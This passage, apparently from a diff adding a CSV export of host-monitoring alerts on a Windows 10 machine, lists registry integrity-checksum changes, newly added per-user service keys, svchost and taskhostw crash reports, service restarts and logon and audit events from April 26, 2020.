sha1sum was: '7707469f1df348faab167e60c47e12aed52a2835' +New sha1sum is : 'cb63b0626d83252dfc1dd8231d2a580d21c187b9' +", +"Apr 26, 2020 @ 10:19:08.425",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. 
+Old md5sum was: '69f9f86f89c4f1044f697b8ca9951f90' +New md5sum is : 'e9ef0b8c325bfb0a609f6799d3827654' +Old sha1sum was: 'ff1c71f7d5380708f2299827b7f088e4f472cde2' +New sha1sum is : '68007f388b116fccad66a3e01436ae1858961252' +", +"Apr 26, 2020 @ 10:19:07.408",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. +Old md5sum was: '7b25497674cc671619a3e52c5a6b72e8' +New md5sum is : '8a0a8d07eea86b539eda744d634970a7' +Old sha1sum was: 'c42697f1b7d2dcbd8290e433e4dc2ca12090701a' +New sha1sum is : '13b48166dd998d149496ded5fcb7c865b7232aad' +", +"Apr 26, 2020 @ 10:19:05.877",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +", +"Apr 26, 2020 @ 10:19:05.643",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: '73ff3da5b491b534e4f1fca73d797712' +New md5sum is : 'b3328f49681d0d76c741c753456eb1d9' +Old sha1sum was: '4f491ce1ca6fff4e44240d89175bfd01ac0bfaf4' +New sha1sum is : 'bf952c979d4315a58b51879a04d06e5abcfb3387' +", +"Apr 26, 2020 @ 10:19:05.220",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:05.207",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:04.784",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'd73c739d94aff99e2de6c480608f2631' +New md5sum is : '1679fca6bba3a5f03a7d79dff5bcb458' +Old sha1sum was: 'e68a929ae8dc2dda3351cb8777f4c6a4351c08c7' +New sha1sum is : 'e9cfd3725ff4cda0fffd712cc9750e6af7b7fb6b' +", +"Apr 26, 2020 @ 10:19:04.621",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '057b39f9a279a74ae6e39c10634a6eab' +New md5sum is : '445093b05e3c653dcf2a302f143eccc3' +Old sha1sum was: 'd9be4838d8b27777b7d1f01677d6ae2e41541245' +New sha1sum is : 'd573d466e7c710f11e24ad2f0302d2d81141833c' +", +"Apr 26, 2020 @ 10:19:04.109",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:19:04.047",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:19:03.419",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9' +", +"Apr 26, 2020 @ 10:19:00.942",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: 'ae5aeacd0ec096e337ca3ae6a707a5ef' +New md5sum is : 'd1d119358adf4b5d9f1b27ab99ecbf90' +Old sha1sum was: 'cc73062438c2d276ae920c586c61e8046d7af96f' +New sha1sum is : '19b7a7364dfbdb1bcaa923b247b0c1128527935e' +", +"Apr 26, 2020 @ 10:18:56.060",4,"Summary event of the report's signatures",,"""Fault bucket 1340614098797145948, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5fefc7f9 +P4: ntdll.dll +P5: 10.0.18362.719 +P6: 64d10ee0 +P7: c0000005 +P8: 000000000003b890 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER46FD.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4911.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4960.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4992.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A2F.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_taskhostw.exe_f03d5bcdadeaa8d94b71a3de2476f74781d7ec_77010e55_f6073c5d-349c-4171-93e0-67e6f6decd0a + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 62bf5efb-1180-4946-8bcc-0a1fa4955f52 +Report Status: 268435456 +Hashed bucket: 885ca8354b51bc10e29ad16b83af2f5c +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:55.857",4,"Summary event of the report's signatures",,"""Fault bucket 1574314897565228993, type 5 +Event Name: FaultTolerantHeap +Response: Not available +Cab Id: 0 + +Problem signature: +P1: taskhostw.exe +P2: 10.0.18362.387 +P3: 5FEFC7F9 +P4: ffffbaad +P5: +P6: +P7: +P8: +P9: +P10: + +Attached files: +\\?\C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FTH4631.tmp\fthempty.txt +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4632.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4662.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4683.tmp.csv 
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER4962.tmp.txt + +These files may be available here: + + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 91752389-45cb-4b19-93b1-f8c51082bfca +Report Status: 268435456 +Hashed bucket: 7eb09b8cb07fb8ab75d9170ee9fb1fc1 +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:55.296",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +", +"Apr 26, 2020 @ 10:18:54.423",10,"Multiple Windows error Application events",,"""Faulting application name: taskhostw.exe, version: 10.0.18362.387, time stamp: 0x5fefc7f9 +Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0 +Exception code: 0xc0000005 +Fault offset: 0x000000000003b890 +Faulting process id: 0xe5c +Faulting application start time: 0x01d61bb3a5864206 +Faulting application path: C:\Windows\system32\taskhostw.exe +Faulting module path: C:\Windows\SYSTEM32\ntdll.dll +Report Id: 62bf5efb-1180-4946-8bcc-0a1fa4955f52 +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:18:51.978",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : 'dc9f9e3fba782230828c1350ebdd6327' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'df82c4e7b328c25ab2a829fbb36079904d347a00' +", +"Apr 26, 2020 @ 10:18:51.958",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: 'f93cf0221c7bffcbf0606d9f193a943e' +New md5sum is : '5b91e535422785d7409df5362ceec530' +Old sha1sum was: '098e4d9f53900d4e8394afe508e54240c78b74ad' +New sha1sum is : '4e27ba555e6d427aef066e320154eafec1fd64e2' +", +"Apr 26, 2020 @ 10:18:46.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Parameters' checksum changed. +Old md5sum was: '9b8b0c1b2fdd2917dcea0a52c206fe0f' +New md5sum is : '22db61ca4d6677015583188761debc91' +Old sha1sum was: 'e2d151ced1a3ae668798b29f1dc7b3cb60fa3c6a' +New sha1sum is : 'e4ba2da980ad989eca1807f8ae283e0bae170be8' +", +"Apr 26, 2020 @ 10:18:46.759",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'fa742e572a0ab3ad838cdc36f548a2e7' +New md5sum is : 'b94f00fb649e58278413ddb218687776' +Old sha1sum was: '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +New sha1sum is : '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +", +"Apr 26, 2020 @ 10:18:46.325",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:18:44.549",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:44.516",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\Security' was added. 
+", +"Apr 26, 2020 @ 10:18:43.706",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:43.636",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:42.701",5,"Windows Push Notifications User Service_3ddcb terminated unexpectedly",,"""The Windows Push Notifications User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:42.685",5,"Sync Host_3ddcb terminated unexpectedly",,"""The Sync Host_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 10000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:42.670",5,"Connected Devices Platform User Service_3ddcb terminated unexpectedly",,"""The Connected Devices Platform User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service.""" +"Apr 26, 2020 @ 10:18:40.883",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:40.867",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\Security' was added. 
+", +"Apr 26, 2020 @ 10:18:38.652",4,"Summary event of the report's signatures",,"""Fault bucket 1712032597060996587, type 4 +Event Name: APPCRASH +Response: Not available +Cab Id: 0 + +Problem signature: +P1: svchost.exe +P2: 10.0.18362.1 +P3: 32d6c210 +P4: StackHash_1e37 +P5: 0.0.0.0 +P6: 00000000 +P7: c0000005 +P8: PCH_3F_FROM_unknown+0x0000000000000000 +P9: +P10: + +Attached files: +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERF2D2.tmp.dmp +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA26.tmp.WERInternalMetadata.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFA85.tmp.xml +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFAB2.tmp.csv +\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WERFBBD.tmp.txt + +These files may be available here: +\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_587e13b520c95378594ab28d96677fe486af_a3c514cf_dbf04cb6-fc27-47d9-8f70-770b0c940091 + +Analysis symbol: +Rechecking for solution: 0 +Report Id: 8446e2b8-e3d2-41ee-bccd-ce765b635f5a +Report Status: 268435456 +Hashed bucket: 465c10de1bbb5ea477c25c9387b5cdeb +Cab Guid: 0""" +"Apr 26, 2020 @ 10:18:36.529",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:33.739",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'b8985f1b126d932a99487749fdf9ab61' +New md5sum is : '13dc259f379d87b2e5309e0615660fbd' +Old sha1sum was: '0aebab5e59af6a56fa1ae7562127ce870da100be' +New sha1sum is : '7b7640c8ae985ec313fc158f04c94160aed9ba62' +", +"Apr 26, 2020 @ 10:18:32.365",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210 +Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000 +Exception code: 0xc0000005 +Fault offset: 0x00007ff7a3a6e38d +Faulting process id: 0xdf4 +Faulting application start time: 0x01d61bb3a5706ae0 +Faulting application path: C:\Windows\system32\svchost.exe +Faulting module path: unknown +Report Id: 8446e2b8-e3d2-41ee-bccd-ce765b635f5a +Faulting package full name: +Faulting package-relative application ID: """ +"Apr 26, 2020 @ 10:18:31.986",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'eb451d1c81877c08f0b9378a02b78cb8' +New md5sum is : '9a0e6860ed855c30f134fc56d8ebf295' +Old sha1sum was: '292c05defeea59b66249e8d3b66bbf630e137b4e' +New sha1sum is : 'ed3b06cd890e72527d6a9facc45f47e75ca198c0' +", +"Apr 26, 2020 @ 10:18:31.925",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb' was added. +", +"Apr 26, 2020 @ 10:18:31.917",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb\TriggerInfo\0' was added. +", +"Apr 26, 2020 @ 10:18:31.899",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_3ddcb\Security' was added. +", +"Apr 26, 2020 @ 10:18:29.188",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. 
+Old md5sum was: '74049b531420855636310bdfb129d2a6' +New md5sum is : '89904bca42bd12d882afe9cb3a12bab9' +Old sha1sum was: '65b480bed22c4db304c75b2f6d15e761ed0100ff' +New sha1sum is : '42299ea8ccb144377794744777f36b2f90c289ed' +", +"Apr 26, 2020 @ 10:18:27.466",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:24.390",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '0cbc77b2e0aaa3642f8cf5e287f555fe' +New md5sum is : 'd49b1e0e5d54f0f3afc8611036d44088' +Old sha1sum was: '45fc8f588e9ab2e89be66470a3f47191a88879cd' +New sha1sum is : '67d1db6f9eb60c510bc959d4fed11edd37751205' +", +"Apr 26, 2020 @ 10:18:23.911",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '9dd44ab3667835a6fd354bf56c4a1651' +New md5sum is : 'ed88c4f4720f9ee85957abb94f304681' +Old sha1sum was: '00db93fa33851b88d4aa41bb77962adfafc2fc1f' +New sha1sum is : 'dfbfadf824ea326343b7e38b3f7914f74c482b0b' +", +"Apr 26, 2020 @ 10:18:21.192",3,"Windows Logon Success",,"""An account was successfully logged on. 
+ +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. 
+ - Package name indicates which sub-protocol was used among the NTLM protocols.
+ - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."""
+"Apr 26, 2020 @ 10:18:21.160",5,"Windows System error event",,"""The server {0134A8B2-3407-4B45-AD25-E9F7C92A80BC} did not register with DCOM within the required timeout."""
+"Apr 26, 2020 @ 10:18:18.578",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed.
+Old md5sum was: 'ec109de3886a2efd6eb1e250bf7a7b85'
+New md5sum is : '928e94381124a05da64e86d6a4f0d898'
+Old sha1sum was: '5d2cbc66bd22c5f71a6845fe7dacfc4b1bc32ffd'
+New sha1sum is : 'fd76ddbb94c20f07eff5295a64445a1617cf28c2'
+",
+"Apr 26, 2020 @ 10:18:18.092",5,"GameDVR and Broadcast User Service_3ddcb terminated unexpectedly",,"""The GameDVR and Broadcast User Service_3ddcb service terminated unexpectedly. It has done this 1 time(s). The following corrective action will be taken in 3000 milliseconds: Restart the service."""
+"Apr 26, 2020 @ 10:18:17.923",4,"Summary event of the report's signatures",,"""Fault bucket 1421593295057521696, type 4
+Event Name: APPCRASH
+Response: Not available
+Cab Id: 0
+
+Problem signature:
+P1: svchost.exe
+P2: 10.0.18362.1
+P3: 32d6c210
+P4: ntdll.dll
+P5: 10.0.18362.719
+P6: 64d10ee0
+P7: c0000005
+P8: 000000000003b890
+P9:
+P10:
+
+Attached files:
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER7DA2.tmp.dmp
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8072.tmp.WERInternalMetadata.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER811F.tmp.xml
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8189.tmp.csv
+\\?\C:\ProgramData\Microsoft\Windows\WER\Temp\WER8458.tmp.txt
+
+These files may be available here:
+\\?\C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_svchost.exe_a4555823d184431378d589e9aa5705236516327_a3c514cf_e071c3cc-922a-4964-b900-f5b769cb8610
+
+Analysis symbol:
+Rechecking for solution: 0
+Report Id: 10f4389b-df96-41b1-9c19-825ed1bc6d13
+Report Status: 268435456
+Hashed bucket: 1b46097b621a046973ba8391e6fb0c20
+Cab Guid: 0"""
+"Apr 26, 2020 @ 10:18:16.751",9,"Windows Application error event",,"""Faulting application name: svchost.exe, version: 10.0.18362.1, time stamp: 0x32d6c210
+Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
+Exception code: 0xc0000005
+Fault offset: 0x000000000003b890
+Faulting process id: 0x1aa0
+Faulting application start time: 0x01d61bb3b32d948b
+Faulting application path: C:\Windows\system32\svchost.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 10f4389b-df96-41b1-9c19-825ed1bc6d13
+Faulting package full name:
+Faulting package-relative application ID: """
+"Apr 26, 2020 @ 10:18:15.547",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed.
+Old md5sum was: 'ca35b3434e75df3b34c1d26a04166cfd'
+New md5sum is : '77517218f6d65414f84259a7db1cedc3'
+Old sha1sum was: '668b2e62b78990f2282cc075d2b3ccc22e99e40f'
+New sha1sum is : 'dd8fed94c228cf08e019cb4c5a2ca355f7d28d19'
+",
+"Apr 26, 2020 @ 10:18:14.245",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:14.230",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:14.113",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:14.094",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:13.700",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:13.666",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:12.804",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:12.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:12.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:12.577",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:12.399",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed.
+Old md5sum was: '932b5dbb92394e990edc45136317decb'
+New md5sum is : 'd3fc2e40ff1cbd8f3e440cadb414e8a1'
+Old sha1sum was: '849a3d58f1f5737e890bf0a2a070ec15c475e77c'
+New sha1sum is : 'da09e52cc3e283503fcbc0fc9d976d29b6f64ab9'
+",
+"Apr 26, 2020 @ 10:18:10.791",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:10.771",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:10.447",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:10.431",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:10.277",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:10.211",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:07.310",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:07.296",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\4' was added.
+",
+"Apr 26, 2020 @ 10:18:07.296",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\3' was added.
+",
+"Apr 26, 2020 @ 10:18:07.260",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\2' was added.
+",
+"Apr 26, 2020 @ 10:18:07.227",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\1' was added.
+",
+"Apr 26, 2020 @ 10:18:07.150",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\TriggerInfo\0' was added.
+",
+"Apr 26, 2020 @ 10:18:07.133",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:06.931",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed.
+Old md5sum was: '6a4fdf3a9f7dc36fc03599f720d484d3'
+New md5sum is : '775174ea9bf25c40ba381ca284d7511d'
+Old sha1sum was: '9f469b80d1166a11ab0299760c6cb444ef555670'
+New sha1sum is : 'eab80f5279cedff3dd227a62f8828aa899a27475'
+",
+"Apr 26, 2020 @ 10:18:06.460",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb' was added.
+",
+"Apr 26, 2020 @ 10:18:06.448",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_3ddcb\Security' was added.
+",
+"Apr 26, 2020 @ 10:18:06.118",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed.
+Old md5sum was: '944a577bedabae60ae06cddefb7165df'
+New md5sum is : '5181b4c5fa4d76f81d7fdf10f04f8fed'
+Old sha1sum was: '0b905fbbc611035f372f84de2f7e227f391ae4c1'
+New sha1sum is : '405074a24cd737fc537d3d10c46ed8de8efc0f53'
+",
+"Apr 26, 2020 @ 10:18:06.103",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed.
+Old md5sum was: 'd64ecd3813037bada0bfee569056567f'
+New md5sum is : '2260e23b4e8cb4aab7b1510c661619d3'
+Old sha1sum was: '5e4e3349a0a93949f867c623c0c0cda1be5c09c0'
+New sha1sum is : 'bdb12d4d842a983afc5e8cd05ad2bd4f6d4e35a7'
+",
